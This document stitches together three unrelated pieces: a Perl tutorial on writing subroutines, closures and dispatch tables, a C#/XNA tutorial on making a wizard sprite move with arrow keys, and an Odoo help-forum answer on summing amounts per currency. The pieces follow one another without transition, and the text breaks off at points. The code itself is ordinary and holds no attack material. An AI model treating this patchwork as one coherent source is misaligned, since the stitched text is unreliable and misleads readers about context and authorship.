The same is true for your code. We write programs for a human's benefit. The computer doesn't care how complicated or simple your code is to read--it converts everything to the same 1s and 0s whether it has perfect indentation or is all on one line. Programming guidelines, and nearly every single programming language feature, exist for human benefit.
Tell Me More
Subroutines truly are the magical cure for all that ails your programs. When done right, you will find that you write your programs in half the time, you have more confidence in what you've written, and you can explain it to others more easily.
Naming
A subroutine provides a name for a series of steps. This is especially important when dealing with complicated processes (or algorithms). While this includes ivory-tower solutions such as the Guttler-Rossman transformation (for sorting), this also includes the overly complicated way your company does accounts receivables. By putting a name on it, you're making it easier to work with.
Code Reuse
Face it--you're going to need to do the same thing over and over in different parts of your code. If you have the same 30 lines of code in 40 places, it's much harder to apply a bugfix or a requirements change. Even better, if your code uses subroutines, it's much easier to optimize just that one little bit that's slowing the whole application down. Studies have shown that 80 percent of the application's runtime generally occurs within one percent of an application's code. If that one percent is in a few subroutines, you can optimize it and hide the nasty details from the rest of your code.
Testability
To many people, "test" is a four-letter word. I firmly believe this is because they don't have enough interfaces to test against. A subroutine provides a way of grabbing a section of your code and testing it independently of all the rest of your code. This independence is key to having confidence in your tests, both now and in the future.
In addition, when someone finds a bug, the bug will usually occur in a single subroutine. When this happens, you can alter that one subroutine, leaving the rest of the system unchanged. The fewer changes made to an application, the more confidence there is in the fix not introducing new bugs along with the bugfix.
Ease of Development
No one argues that subroutines are bad when there are ten developers working on a project. They allow different developers to work on different parts of the application in parallel. (If there are dependencies, one developer can stub the missing subroutines.) However, they provide an equal amount of benefit for the solo developer: they allow you to focus on one specific part of the application without having to build all of the pieces up together. You will be happy for the good names you chose when you have to read code you wrote six months ago.
Consider the following example of a convoluted conditional:
if ((($x > 3 && $x<12) || ($x>15 && $x<23)) && (($y<2260 && $y>2240) || ($z>foo_bar() && $z<bar_foo()))) {
It's very hard to exactly what's going on. Some judicious white space can help, as can improved layout. That leaves:
if ( ( ( $x > 3 && $x < 12) || ($x > 15 && $x < 23) ) && ( ($y < 2260 && $y > 2240) || ($z > foo_bar() && $z < bar_foo()) ) ) {
Gah, that's almost worse. Enter a subroutine to the rescue:
sub is_between { my ($value, $left, $right) = @_; return ( $left < $value && $value < $right ); } if ( ( is_between( $x, 3, 12 ) || is_between( $x, 15, 23 ) ) && ( is_between( $y, 2240, 2260 ) || is_between( $z, foo_bar(), bar_foo() ) ) {
That's so much easier to read. One thing to notice is that, in this case, the rewrite doesn't actually save any characters. In fact, this is slightly longer than the original version. Yet, it's easier to read, which makes it easier to both validate for correctness as well as to modify safely. (When writing this subroutine for the article, I actually found an error I had made--I had flipped the values for comparing
$y so that the
$y conditional could never be true.)
How Do I Know if I'm Doing It Right?
Just as there are good sandwiches (turkey club on dark rye) and bad sandwiches (peanut butter and banana on Wonder bread), there are also good and bad subroutines. While writing good subroutines is very much an art form, there are several characteristics you can look for when writing good subroutines. A good subroutine is readable and has a well-defined interface, strong internal cohesion, and loose external coupling.
Readability
The best subroutines are concise--usually 25-50 lines long, which is one or two average screens in height. (While your screen might be 110 lines high, you will one day have to debug your code on a VT100 terminal at 3 a.m. on a Sunday.)
Part of being readable also means that the code isn't overly indented. The guidelines for the Linux kernel code include a statement that all code should be less 80 characters wide and that indentations should be eight characters wide. This is to discourage more than three levels of indentation. It's too hard to follow the logic flows with any more than that.
Well-Defined Interfaces
This means that you know all of the inputs and all of the outputs. Doing this allows you to muck with either side of this wall and, so long as you keep to the contract, you have a guarantee that the code on the other side of the interface will be safe from harm. This is also critical to good testing. By having a solid interface, you can write test suites to validate both the subroutine and to mock the subroutine to test the code that uses it.
Strong Internal Cohesion
Internal cohesion is about how strongly the lines of code within the subroutine relate to one another. Ideally, a subroutine does one thing and only one thing. This means that someone calling the subroutine can be confident that it will do only what they want to have done.
Loose External Coupling
This means that changes to code outside of the subroutine will not affect how the subroutine performs, and vice versa. This allows you to make changes within the subroutine safely. This is also known as having no side effects.
As an example, a loosely coupled subroutine should not access global variables unnecessarily. Proper scoping is critical for any variables you create in your subroutine, using the
my keyword.
This also means that a subroutine should be able to run without depending upon other subroutines to be run before or after it. In functional programming, this means that the function is stateless.
Perl has global special variables (such as
$_,
@_,
$?,
$@, and
$!). If you modify them, be sure to localize them with the
local keyword.
What Should I Call It?
Naming things well is important for all parts of your code. With subroutines, it's even more important. A subroutine is a chunk of work described to the reader only by its name. If the name is too short, no one knows what it means. If the name is too long, then it's too hard to understand and potentially difficult to type. If the name is too specific, you will confuse the reader when you call it for more general circumstances.
Subroutine names should flow when read out loud:
doThis() for actions and
is_that() for Boolean checks. Ideally, a subroutine name should be
verbNoun() (or
verb_noun()). To test this, take a section of your code and read it out loud to your closest non-geek friend. When you're done, ask them what that piece of code should do. If they have no idea, your subroutines (and variables) may have poor names. (I've provided examples in two forms, "camelCase" and "under_score." Some people prefer one way and some prefer the other. As long as you're consistent, it doesn't matter which you choose.)
What Else Can I Do?
(This section assumes a strong grasp of Perl fundamentals, especially hashes and references.)
Perl is one of a class of languages that allows you to treat subroutines as first-class objects. This means you can use subroutines in nearly every place you can use a variable. This concept comes from functional programming (FP), and is a very powerful technique.
The basic building block of FP in Perl is the reference to a subroutine, or
subref. For a named subroutine, you can say
my $subref = \&foobar;. You can then say
$subref->(1, 2) and it will be as if you said
foobar(1, 2). A subref is a regular scalar, so you can pass it around as you can any other reference (say, to an array or hash) and you can put them into arrays and hashes. You can also construct them anonymously by saying
my $subref = sub { ... }; (where the
... is the body of the subroutine).
This provides several very neat options.
Closures
Closures are the main building blocks for using subroutines in functional programming. A closure is a subroutine that remembers its lexical scratchpad. In English, this means that if you take a reference to a subroutine that uses a
my variable defined outside of it, it will remember the value of that variable when it was defined and be able to access it, even if you use the subroutine outside of the scope of that variable.
There are two main variations of closures you see in normal code. The first is a named closure.
{ my $counter = 0; sub inc_counter { return $counter++ } }
When you call
inc_counter(), you're obviously out of scope for the
$counter variable. Yet, it will increment the counter and return the value as if it were in scope.
This is a very good way to handle global state, if you're uncomfortable with object-oriented programming. Just extend the idea to multiple variables and have a getter and setter for each one.
The second is an anonymous closure.
Recursion
Many recursive functions are simple enough that they do not need to keep any state. Those that do are more complicated, especially if you want to be able to call the function more than once at a time. Enter anonymous subroutines.
sub recursionSetup { my ($x, $y) = @_; my @stack; my $_recurse = sub { my ($foo, $bar) = @_; # Do stuff here with $x, $y, and @stack; }; my $val = $_recurse->( $x, $y ); return $val; }
Inner Subroutines
Subroutine definitions are global in Perl. This means that Perl doesn't have inner subroutines.
sub foo { sub bar { } # This bar() should only be accessible from within foo(), # but it is accessible from everywhere bar(): }
Enter anonymous subroutines again.
sub foo { my $bar = sub { }; # This $bar is only accessible from within foo() $bar->(); }
Dispatch Tables
Often, you need to call a specific subroutine based some user input. The first attempts to do this usually look like this:
if ( $input eq 'foo' ) { foo( @params ); } elsif ( $input eq 'bar' ) { bar( @params ); } else { die "Cannot find the subroutine '$input'\n"; }
Then, some enterprising soul learns about soft references and tries something like this:
&{ $input }( @params );
That's unsafe, because you don't know what
$input will to contain. You cannot guarantee anything about it, even with taint and all that jazz on. It's much safer just to use dispatch tables:
my %dispatch = ( foo => sub { ... }, bar => \&bar, ); if ( exists $dispatch{ $input } ) { $dispatch{ $input }->( @params ); } else { die "Cannot find the subroutine '$input'\n"; }
Adding and removing available subroutines is simpler than the
if-
elsif-
else scenario, and this is much safer than the soft references scenario. It's the best of both worlds.
Subroutine Factories
Often, you will have many subroutines that look very similar. You might have accessors for an object that differ only in which attribute they access. Alternately, you might have a group of mathematical functions that differ only in the constants they use.
sub make_multiplier { my ($multiplier) = @_; return sub { my ($value) = @_; return $value * $multiplier; }; } my $times_two = make_multiplier( 2 ); my $times_four = make_multiplier( 4 ); print $times_two->( 6 ), "\n"; print $times_four->( 3 ), "\n"; ---- 12 12
Try that code and see what it does. You should see the values below the dotted line.
Conclusion
Subroutines are arguably the most powerful tool in a programmer's toolbox. They provide the ability to reuse sections of code, validate those sections, and create new algorithms that solve problems in novel ways. They will reduce the amount of time you spend programming, yet allow you to do more in that time. They will reduce the number of bugs in your code ten-fold, and allow other people to work with you while feeling safe about it. They truly are programming's super-tool. | http://www.perl.com/pub/2005/11/03/subroutines.html | CC-MAIN-2015-11 | refinedweb | 2,337 | 70.94 |
OData Connected Service 0.7.1 Release
Clément
We are pleased to announce a new release of OData Connected Service, version 0.7.1. This version adds the following important features and bug fixes:
- VB.NET support
- Option to include or exclude operation imports from generated code
- Ability to access the metadata endpoint behind a proxy
- Bug fixes and other improvements
You can get the extension from the Visual Studio Marketplace.
1. VB.NET Support
You can now use OData Connected Service extension to generate OData client code for Visual Basic projects. The features supported in C# are also supported in VB.NET projects.
Let’s create a simple VB.NET project to demonstrate how it works. Open Visual Studio and create a VB .NET Core Console App.
When the new project is ready, right-click the project node from the Solution Explorer and then choose Add > Connected Service in the context menu that appears
In the Connected Services tab, select OData Connected Service.
This loads the OData Connected Service configuration wizard. For this demo, we’ll keep things simple and stick to the default settings. For the service address, use the sample Trip Pin service endpoint:
Click Finish to start the client code generation process. After the process is complete, a Connected Services node is added to your project together with a child node named “OData Service”. Inside the folder you should see the generated Reference.vb file.
We’ll use the generated code to fetch a list of people from the service and display their names in the console.
Open the Program.vb file and replace its content with the following code:
Imports System ' this is the namespace that contains the generated code, based on the namespace defined in the service metadata Imports OcsVbDemo.Microsoft.OData.SampleService.Models.TripPin Module Program Sub Main(args As String()) DisplayPeople().Wait() End Sub ''' <summary> ''' Fetches and displayes a list of people from the OData service ''' </summary> ''' <returns></returns> Async Function DisplayPeople() As Task Dim container = New DefaultContainer(New Uri("")) Dim people = Await container.People.ExecuteAsync() For Each person In people Console.WriteLine(person.FirstName) Next End Function End Module
The
DefaultContainer is a generated class that inherits from DataServiceContext and gives us access to the resources exposed by the service. We create a Container instance using the URL of the service root. The container has a generated People property which we’ll use to execute a query against the People entity set on the OData service and then display the results.
Finally, let’s run the app. You should see a list of names displayed on the console:
2. Include/Exclude operation imports
This feature allows you to select the operations you want included in the generated code and exclude the ones you don’t want. This gives you more control and helps keep the generated code lean. There is more work being done in this area, and in an upcoming release, you will also have the option to exclude entity types that you don’t need.
This feature is available on the new Function/Action Imports page of the wizard.
In the example above, GetNearestAirport and ResetDataSource will be generated, but GetPersonWithMostFriends will not.
Here are some important things to keep in mind regarding this feature:
- It only covers operation imports (action and function imports), which are exposed directly on the entity container, it does not affect functions and actions accessible through entity types.
- When an operation import is excluded, all its overloads get excluded
- It is not supported for OData v3 services or lower.
3. Fetching service metadata behind a web proxy
Previously, when you used the connected service on a network that has a web proxy, the call to fetch service metadata would fail. To address this issue, we have provided a means for you to specify the web proxy configuration and credentials needed to access the network in such situations. These settings are not saved in the generated client, they are only used to fetch the metadata document during code generation. They are also not persisted or cached by default, meaning you would have to enter them each time you add or update a connected service.
You can specify the web proxy settings on the first page of the configuration wizard:
4. Bug fixes and minor improvements
- A bug was reported in the previous release that caused the connected service to fail if you provided a local file as the service address. This bug has been fixed
- We added a Browser button to make it easier to select local files
Stay tuned for the next release.
Special thanks to the following contributors:
- Chebotov Nickolay – VB support feature.
This is crazy – in a positive sense. Are you guys going tp keep up this speed and start fixing what I remember to be the main reason to use simple.odata – missing features? Because it looks like you actually are getting serious with this client and I LOVE that part. Gratulations. Keep up that immense speed. Push updates as often as possible. This is what those of us using odata need.
Hey, as someone interested in using odata for the first time I’d be interested to know what someone with obvious experience considers to be ‘missing features’ to help me understand the landscape, especially with graphql becoming quite popular. Thanks! | https://devblogs.microsoft.com/odata/odata-connected-service-0-7-1-release/ | CC-MAIN-2020-50 | refinedweb | 891 | 54.12 |
I wanted to create an easy way to setup a Settings (options) dialog box similar to the Options box of Visual Studio when you go to Tools > Options. There were a few requirements I wanted to include like, reusability, handling many data types, categories, sorting and spaces in the names. For complete explanation of the code described in this article, please download the source code and read the comments. Each function/subroutine is fully commented, as well as has the new XML comments (new for VB) for each one (no XML comments are on control handlers).
12/12/2005 - I'd like to thank Peter Spiegler for sending me the code to support system-defined enumerations.
The great part about this dialog box is that it reads all the settings from the
My.Settings namespace, which means you can create/edit your default settings directly from the IDE designer. You can do this by going to Project > {name} Properties... and then going to the Settings page.
There are a few rules that are imposed on your settings in order for them to show up in the dialog box:
The underscore is required so that it can separate the actual name of your setting from the category you wish to put it in. See the screenshot below for some examples:
You'll notice several settings in the screenshot have double underscores in their names. This was to allow spaces in either the category name or in the setting name itself. You'll also notice that all the names in the screenshot have a number after them. This is for the settings sort index within its own category. The setting needs to have a scope of user, not application. When a setting has a scope of application - it is readonly at runtime, and since we want to change these settings at runtime it must have a scope of user.
There are several data types that are supported by the IDE's Settings Designer, but it is a little more difficult to support data types such as a TimeSpan, or a GUID. While a
TextBox could provide support for editing these, I didn't want to mess with the validation, and the use of these as User scoped objects that you'd want to change in an Options dialog, I felt, was rare. The list of supported types:
Byte
Char
Decimal
Double
Integer
Long
SByte
Short
Single
String
UInteger
ULong
UShort
Using the form is like using any other form. Declare an instance of it and use the
ShowDialog method. There are several different styles to choose from - see below for more details on them.
Dim f As New frmOptions f.Style = frmOptions.OptionsStyle.FireFox2 f.ShowDialog(Me)
There are four different styles that you can use.
TreeView and
TabPages aren't anything new, but since 12/12/2005 I've included support for
FireFox1 and
FireFox2.
FireFox1 is the style of the options box in FireFox before version 1.5 came out.
FireFox2 is the style of FireFox version 1.5. Just changing that one line of code
f.Style = frmOptions.OptionsStyle.FireFox2 you can change the look of the dialog box. Watch out when using the
TreeView style, as it can be confusing for non-technical users (which most likely make up a majority of your user base - thanks Anna). For the FireFox styles, you can also add images. Currently these images must be 32x32 for the controls width/height support, however feel free to modify the code to support other sizes. Here is an example from the downloadable source:
Dim f As New frmOptions 'f.OptionStyle = frmOptions.OptionsStyle.FireFox1 f.Style = frmOptions.OptionsStyle.FireFox2 'f.OptionStyle = frmOptions.OptionsStyle.TabPages 'f.OptionStyle = frmOptions.OptionsStyle.TreeView f.ImageAdd("Database", My.Resources.database) f.ImageAdd("Misc", My.Resources.ClockFace) f.ImageAdd("Fonts", My.Resources.fonts) f.ImageAdd("Colors", My.Resources.circles) f.ImageAdd("COM", My.Resources.rotary_phone) f.ShowDialog(Me)
ImageAdd allows you to add the images. Here I have all my images loaded as resources so that I can easily reference them. You must specify the main group that each image ties to as you add them, or they will not show up.
TreeView
TabPages
FireFox1
FireFox2
The form is relatively simple. I have a
TreeView anchored on the left with a
TableLayoutPanel anchored on the right. These serve as the housing for the settings. One note about the
TreeView - the path separator is a period. There is also a checkbox, so that the users can choose whether they want to save their settings when the application exits or not, as well as the standard "OK", "Cancel" and "Apply" dialog buttons.
In order to be able to change the settings, but not apply them (hence the Apply and OK buttons) we need to have a storage spot for all our setting information. So, I created a class with a collection to store that information for us -
SettingInfo and
SettingInfoCollection. Each object of
SettingInfo needs to store the
Name,
Category,
SortIndex, and
Value. There is a subroutine in the class that will load all these, when called passing it the true setting name (what you see in the designer). The collection should return to us all the settings of a given category, and change a value (or even a full item for sorting) for a given Index or true name.
In the
Load event of the form, we need to load all the settings available to us. To do that we need to cycle through each
SettingsProperty in
My.Settings.Properties, adding each one to the collection:
'Load the SaveOnExit value chkSaveOnExit.Checked = My.Application.SaveMySettingsOnExit 'Setup the Setting property object for grabing all the settings Dim sp As System.Configuration.SettingsProperty = Nothing 'Cycle through each setting and add it if appropriate. For Each sp In My.Settings.Properties 'If the name doesn't have an underscore - we can't 'assign a category so we can't change it. 'If the setting is ApplicationScoped - we aren't 'able to hange it at runtime. 'Check also if there is support on this form for 'the System.Type the setting is. If sp.Name.IndexOf("_") <> -1 AndAlso _ IsUserScope(sp) AndAlso IsAllowedType(sp) Then 'Passed the tests create a new SettingInfo object Dim newSetting As New SettingInfo 'Load the settings data into the object newSetting.LoadData(sp.Name) 'Add the object to the collection Settings.Add(newSetting) End If Next 'Sort the settings by category - makes the 'TreeView look nice quickSort(Settings) 'Load the settings into the TreeView LoadTreeView()
To load the categories into the
TreeView (see the
LoadTreeView() method), I have a function that adds the categories/sub-categories from an array.
After a category is selected from the
TreeView - which should happen when you first display the form - the controls need to be displayed. The
TreeView was an optimal control for displaying the categories because of the
FullPath property of the nodes. So, in order to get all the settings of the selected category we just use the function provided in the class:
'Get all the settings that match this category Dim sets() As SettingInfo = _ Settings.GetByCategory(tvCategories.SelectedNode.FullPath)
From here, I cycle through all the settings returned to me, and determine the appropriate control to use for editing, adding handlers to each control's
LostFocus event to update the value stored in the collection.
Applying the settings is very easy - just loop through each setting in the collection and update the value stored in the
My.Settings namespace:
'Cycle through each setting that we could edit and 'update the real setting contained in the My namespace For Each si As SettingInfo In Settings My.Settings.Item(si.TrueName) = si.Value Next 'Update the SaveOnExit value My.Application.SaveMySettingsOnExit = chkSaveOnExit.Checked
Hitting either the OK or Apply button will trigger the code given above. Apply will not close the dialog box. OK sets the DialogResult to OK and is the Accept button of the form. Cancel is the Cancel button of the form and will set DialogResult to CANCEL.
During runtime, if you've unchecked the save settings on the exit checkbox, the settings will apply correctly when you change them, but after you restart the application they will again be at their defaults. Leaving it checked will ensure that the settings you've changed are carried on to the next run of the program.
I really hate writing conclusions. I'll let you, the readers, come to your own conclusion about this code. I hope you find this helpful and easy to use. Feel free to send any comments/suggestions/bug reports to codeproject@stdominion.net or just leave a message below.
General
News
Question
Answer
Joke
Rant
Admin | http://www.codeproject.com/KB/vb/settingsdialog2005.aspx | crawl-002 | refinedweb | 1,460 | 62.38 |
|
The Wizard - Part 1
Making a Sprite move around the Screen
This is the first in a four part series to show you how to add some movement and action to your sprite. This first part will go over the basics of getting keyboard input from the player and using it to make the Sprite move around the screen. new sprite image that we are going to be using in this tutorial to the game project. You can download the Wizard image used in the project from here. Once you have downloaded the image, add the new Wizard image to the Content folder in your game. enhancements to the Sprite class. These enhancements were made in the "Advanced Scrolling a 2D Background" project, but we will go over them now.
To begin, start by adding the following objects to the top of the Sprite class.
//The asset name for the Sprite's Texture
public string AssetName;
//The Size of the Sprite (with scale applied)
public Rectangle Size;
//The amount to increase/decrease the size of the original sprite.
private float mScale = 1.0f;
The AssetName is a public object used to store the name of the image to be loaded from the Content Pipeline for this sprite. Size is a public object used to give the current size of the sprite after the scale has been applied. mScale is a private object that will tell the Draw method how much to shrink or enlarge the sprite from it's original size.
Next, we're going to add a property to the class. Properties are often used when you have some other things to do when the value of an object changes. In our case, when the scale of the sprite is changed, we need to recalculate the Size of the sprite with that new scale applied.
Add the following property to the Sprite class.
//When the scale is modified throught he property, the Size of the
//sprite is recalculated with the new scale applied.
public float Scale
{
get { return mScale;}
set
{
mScale = value;
//Recalculate the Size of the Sprite with the new scale
Size = new Rectangle(0, 0, (int)(mSpriteTexture.Width * Scale), (int)(mSpriteTexture.Height * Scale));
}
}
The LoadContent method of the Sprite class needs enhanced as well. Modify the LoadContent method of the Sprite class;
Size = new Rectangle(0, 0, (int)(mSpriteTexture.Width * Scale), (int)(mSpriteTexture.Height * Scale));
We added the storing of the asset name and initial calculation of the Sprites size.
Our sprites need to be able to move, so we are going to add a new "Update" method to the class to help us do that. Add the following new Update method to the Sprite class.
//Update the Sprite and change it's position based on the passed in speed, direction and elapsed time.
public void Update(GameTime theGameTime, Vector2 theSpeed, Vector2 theDirection)
Position += theDirection * theSpeed * (float)theGameTime.ElapsedGameTime.TotalSeconds;
Movement is a simple calculation of taking the direction the sprite should be moving in, the speed they should be moving and multiplying those by the time that has elapsed then adjusting the original position with that result.
theDirection is a Vector2 object. A value of -1 in the X value of the Vector2 will indicate something should be moving to the left. A value of 0 indicates it's not moving at all along the X axis. And a value of 1 indicates the sprite should be moving to the right. The same goes for the Y value of the Vector2. A -1 indicates the sprite needs to move up, 0 not moving in the Y direction and 1 means it's moving down. Combinations of X,Y values cause the sprite to move along both the X, Y axis.
theSpeed is how fast the sprite should move in a along a given axis. Value of 0 means it has no speed along that axis, higher speeds make the sprite move faster along the given axis.
theGameTime is used to keep how fast the sprite moves consistent across different computers. By always moving by how much time has elapsed, if a computer's refresh rate is faster, the sprite should still move the same speed as it does on a computer with a slower refresh rate.
With our sprite successfully changing position, now it's time to draw it to the screen in that new position and with it's potentially new scale. Modify the Draw method of the Sprite class);
The SpriteBatch object has several different overrides for Draw (overrides are the same method, but they take additional parameters to give new functionality). In this case, we wanted to re-size the sprite up or down according to Scale so we're passing that in. We're using the defaults for all of the other parameters of that particular override. Eventually in the future we might use them, but for now, we just want to position and scale the sprite.
That's it for the changes to the Sprite class for now. Do a quick Build Build now to make sure all the changes compile correctly. Nothing will be different in the game yet, but it's good to make sure you don't have any errors before you get to much further.
Adding the Wizard class:
We're going to be moving a Wizard character around on the screen (you added the image for the Wizard to the project earlier). The Wizard is going to be a sprite, but he's going to have some additional functionality special to him as well. To do that, we're going to create a new class called "Wizard" and then inherit from the Sprite class. Inheriting gives you the functionality of the other class and allows you to add to that functionality. It's the basis of object oriented programming.
Right-click on the the game project in the Solution Explorer. Select, "Add", then pick "Class" from the add sub-men. This will open up the "Add New Item" dialog. Type in the name "Wizard" for your class and click the "Add" button.
Now we need to start adding some functionality to the Wizard class. Let's start by adding our XNA framework "using" statements to the top of the Wizard class file.
Add the following "using" statements.
using Microsoft.Xna.Framework;
using Microsoft.Xna.Framework.Storage;
using Microsoft.Xna.Framework.Input;
using Microsoft.Xna.Framework.Content;
using Microsoft.Xna.Framework.Graphics;
These just help with the readability of our code so we don't have to type so much to get at the object provided to us by the XNA framework. For example, we can use Vector2 instead of having to type Microsoft.Xna.Framework.Vector2 every time we want to use that object.
It's is now time to indicate that we want to inherit from the Sprite class. Change the class declaration for the Wizard to look like the following.
class Wizard : Sprite
The Wizard class now inherits from the Sprite class and has access to all of it's public and protected members and methods.
We're gong to be using some values in the class over and over again that do not change. So we're going to make these constants of our class. It's a good programming practice to get into the habit of removing "magic" numbers and strings from your code and moving them into variables and constants. A magic number or string is any number that is just magically in your code with no real explanation of what the value is or why it's that value.
Add the following constants to the top of the Wizard class.
const string WIZARD_ASSETNAME = "WizardSquare";
const int START_POSITION_X = 125;
const int START_POSITION_Y = 245;
const int WIZARD_SPEED = 160;
const int MOVE_UP = -1;
const int MOVE_DOWN = 1;
const int MOVE_LEFT = -1;
const int MOVE_RIGHT = 1;
Now let's add some more class level objects that will help give us the functionality we need to move our Wizard sprite around.
Add the following objects to the top of the Wizard class.
enum State
Walking
State mCurrentState = State.Walking;
Vector2 mDirection = Vector2.Zero;
Vector2 mSpeed = Vector2.Zero;
KeyboardState mPreviousKeyboardState;
The State enum is used to store the current "State" of the sprite. What is state? You can think of state as any type of action you need to keep track of for you sprite because it might limit another action or "state". So if the sprite was dead, or powered up or jumping or ducking, etc. Those might all be "states" your Wizard could be in and you might want to check to see if the Wizard was in (or not in) a current state before you do something or draw something to the screen.
Currently, our Wizard only has one state, "Walking". mCurrentState is used to track the current state of the sprite and it's set to "Walking" when it's created.
mDirection is used to store the Direction the Wizard is moving in and mSpeed is used to store the Speed the sprite is moving at in those directions.
mPreviousKeyboardState is used to store the previous state the Keyboard was in last time we checked. This is useful for times when we don't want to repeat an action unless a player has pressed a key on the keyboard again instead of just holding it down. With knowing the previous state of the keyboard we can verify the key was released before, but is now pressed and then do whatever action we need to do for that key.
The Wizard needs to load the new Wizard image, so we're going to model after the base sprite class and add a LoadContent method to the Wizard. Add the following LoadContent method to the Wizard class.
public void LoadContent(ContentManager theContentManager)
Position = new Vector2(START_POSITION_X, START_POSITION_Y);
base.LoadContent(theContentManager, WIZARD_ASSETNAME);
The LoadContent method for the Wizard class does not take in an asset name like the Sprite class does. This is because the Wizard class already knows what asset it needs to load. So first, it sets the initial position of the Wizard (using the constants we declared for the starting x and y positions) and then it calls the "LoadContent" method of the base sprite class it inherits from. It passes into the base LoadContent method the content manager it received in when it's LoadContent method was called and then the constant we declared for the asset name. The "LoadContent" method of the Sprite class will now run and execute all of it's code.
Now, we need to add an "Update" method to the Wizard class. This method will take care of checking for input and moving the sprite around. Add the following Update method to the Wizard class.
public void Update(GameTime theGameTime)
KeyboardState aCurrentKeyboardState = Keyboard.GetState();
UpdateMovement(aCurrentKeyboardState);
mPreviousKeyboardState = aCurrentKeyboardState;
base.Update(theGameTime, mSpeed, mDirection);
The Update method first gets the current state of the keyboard. This is built in functionality of the XNA framework and by calling "Keyboard.GetState();", the XNA framework will report to you all the keys that are pressed and not pressed on the keyboard.
Next, we call a method "UpdateMovement" passing in the current keyboard state. We haven't written this method yet, but we will shortly.
Then, we store the state of the keyboard in our mPreviousKeyboardState object. This will help us when we get to the point that we need to verify that a key wasn't released and then pressed again. We won't be using this functionality for this tutorial, but it's a good habit to get into to make sure it's available when checking keyboard input because you're bound to need that information eventually.
Finally, we call the Update method of the Sprite class we are inheriting from. We pass in the time that has elapsed and the current values for the Speed and Direction of the Wizard. The Update method of the Sprite class will then use those values to adjust the position of the sprite.
That's it for the Update method, but in it we called an "UpdateMovement" method that didn't exist. Let's go ahead and add that method now. This method will handle all of the checking to see if one of the movement keys was pressed and then setting the movement variables for the sprite).
Add the following "UpdateMovement" method to the Wizard class.
private void UpdateMovement(KeyboardState aCurrentKeyboardState)
if (mCurrentState == State.Walking)
{
mSpeed = Vector2.Zero;
mDirection = Vector2.Zero;
if (aCurrentKeyboardState.IsKeyDown(Keys.Left) == true)
{
mSpeed.X = WIZARD_SPEED;
mDirection.X = MOVE_LEFT;
}
else if (aCurrentKeyboardState.IsKeyDown(Keys.Right) == true)
mDirection.X = MOVE_RIGHT;
if (aCurrentKeyboardState.IsKeyDown(Keys.Up) == true)
mSpeed.Y = WIZARD_SPEED;
mDirection.Y = MOVE_UP;
else if (aCurrentKeyboardState.IsKeyDown(Keys.Down) == true)
mDirection.Y = MOVE_DOWN;
The UpdateMovement method is the key method of getting our Wizard sprite to move around. First it checks to make sure the Wizard is in a current state for Walking. Our Wizard can currently ONLY be in a Walking state, but there might be times in the future when we don't want to move him around if he's not currently in a Walking state so we check.
Next, we zero out his direction and speed. Vector2.Zero is a quick and easy way of saying create a new Vector2(0,0). Now we start checking to see what keys are pressed. First we check to see if the Left arrow key or the Right arrow key is pressed. If they are, then we set the Speed along the X axis and indicate the direction. Then we check to see if the Up arrow or the Down arrow are pressed. And again, if they are, then we set the Speed along the Y axis and indicate the direction.
Now, when the base.Update of the Sprite class is called (which happens in our Update method already), the new values for our Wizard speed and direction will be passed and our Wizard sprite will move appropriately.
Do a quick Build to make sure the Wizard class compiles correctly with no errors. You won't see the Wizard on the screen yet (if you're building this off the "Creating a 2D Sprite" project you should still just see the sprites drawn to the screen and you won't be able to move them. So we still have some final changes to make. We need to change the Game1.cs class to use our new Wizard class instead of the Sprite class.
Modifying the Game1.cs Class:
We want to remove references to just using the Sprite class and instead use our Wizard class. So to do that we're going to be deleting some code and then adding some new code to replace it.
Delete the following lines of code from the top of the Game1.cs class
Sprite mSprite;
Sprite mSpriteTwo;
Now add the following line of code to the top of the Game1.cs class.
Wizard mWizardSprite;
Now, modify the Initialize method, to look like the following.
protected override void Initialize()
// TODO: Add your initialization logic here
mWizardSprite = new Wizard();
base.Initialize();
This will create a new instance of our Wizard sprite (and we removed the old lines of code that were creating new instances of the Sprite class).
We now need to load the content of our Wizard. Modify the LoadContent method of the Game1.cs class to look like the following.
protected override void LoadContent()
// Create a new SpriteBatch, which can be used to draw textures.
spriteBatch = new SpriteBatch(GraphicsDevice);
// TODO: use this.Content to load your game content here
mWizardSprite.LoadContent(this.Content);
With our Wizard sprite content loaded, let's add in the ability for the Game1.cs class to "Update" the Wizard. Modify the Update method to look like the following.
protected override void Update(GameTime gameTime)
// Allows the game to exit
if (GamePad.GetState(PlayerIndex.One).Buttons.Back == ButtonState.Pressed)
this.Exit();
// TODO: Add your update logic here
mWizardSprite.Update(gameTime);
base.Update(gameTime);
Finally, we want to draw our Wizard. Modify the Draw method of the Game1.cs class to look like the following.
protected override void Draw(GameTime gameTime)
graphics.GraphicsDevice.Clear(Color.CornflowerBlue);
// TODO: Add your drawing code here
spriteBatch.Begin();
mWizardSprite.Draw(this.spriteBatch);
spriteBatch.End();
base.Draw(gameTime);
Now that we have appropriately modified the Game1.cs class to use our new Wizard class, do a Build and see your results. The Wizard should now be drawn to the screen and you should be able to move him around with the Up, Down, Left and Right arrow keys.
Congratulations! You have successfully figured out how to make a sprite move around the screen in you game. Can you think of some things you can change? Could you add the old Sprites back in and draw them to the screen? What do you think would happen if you tried to add two wizards to the game?
Play with it, experiment and ask questions. Most of all make sure you’re having fun!
Download the source for this project.
Leave comments and feedback for this project on my blog post.
XNADevelopment.com is in no way affiliated with Microsoft. | http://www.xnadevelopment.com/tutorials/thewizard/theWizard.shtml | crawl-001 | refinedweb | 2,875 | 73.58 |
Odoo Help
Odoo is the world's easiest all-in-one management software. It includes hundreds of business apps:
CRM | e-Commerce | Accounting | Inventory | PoS | Project management | MRP | etc.
It is really hard to show or I know nothing about Odoo.
Add to your model something like this
@api.one
def _compute_amount_each_currency(self):
sums=dict([(l.currency_id.name,0) for l in self.expense_ticket_line_ids])
for line in self.expense_ticket_line_ids:
sums[line.currency_id.name]+=line.amount_currency
self.amount_each_currency=json.dumps(sums)
amount_each_currency = fields.Text(compute='_compute_amount_each_currency')
So we have got the field with the sums for each currency. This is the easiest part.
And now show time!
I'm still upset that <templetes> is available only in a kanban view. Am I right?
So in a form view I see only two ways. The first is to add another text field with appropriate text like 'Totals EUR: xxx, CYN: xxx, USD: xxx' in one line and add this field to the view. Baldly but I can't find another way.
A report is more flexible and here we can make it nice looking. Create a model with the render_html function
class ReportSometing(models.AbstractModel):
@api.one
def render_html(self, data=None):
[...]
if objects[0]:
sums=json.loads(objects[0].amount_each_currency)
sums=[[key,value] for key,value in sums.items()]
else:
sums=[]
docargs = {
'sums': sums,
}
[...]
and convert the field with each currency totals into the list of lists of a currency name and its amount.
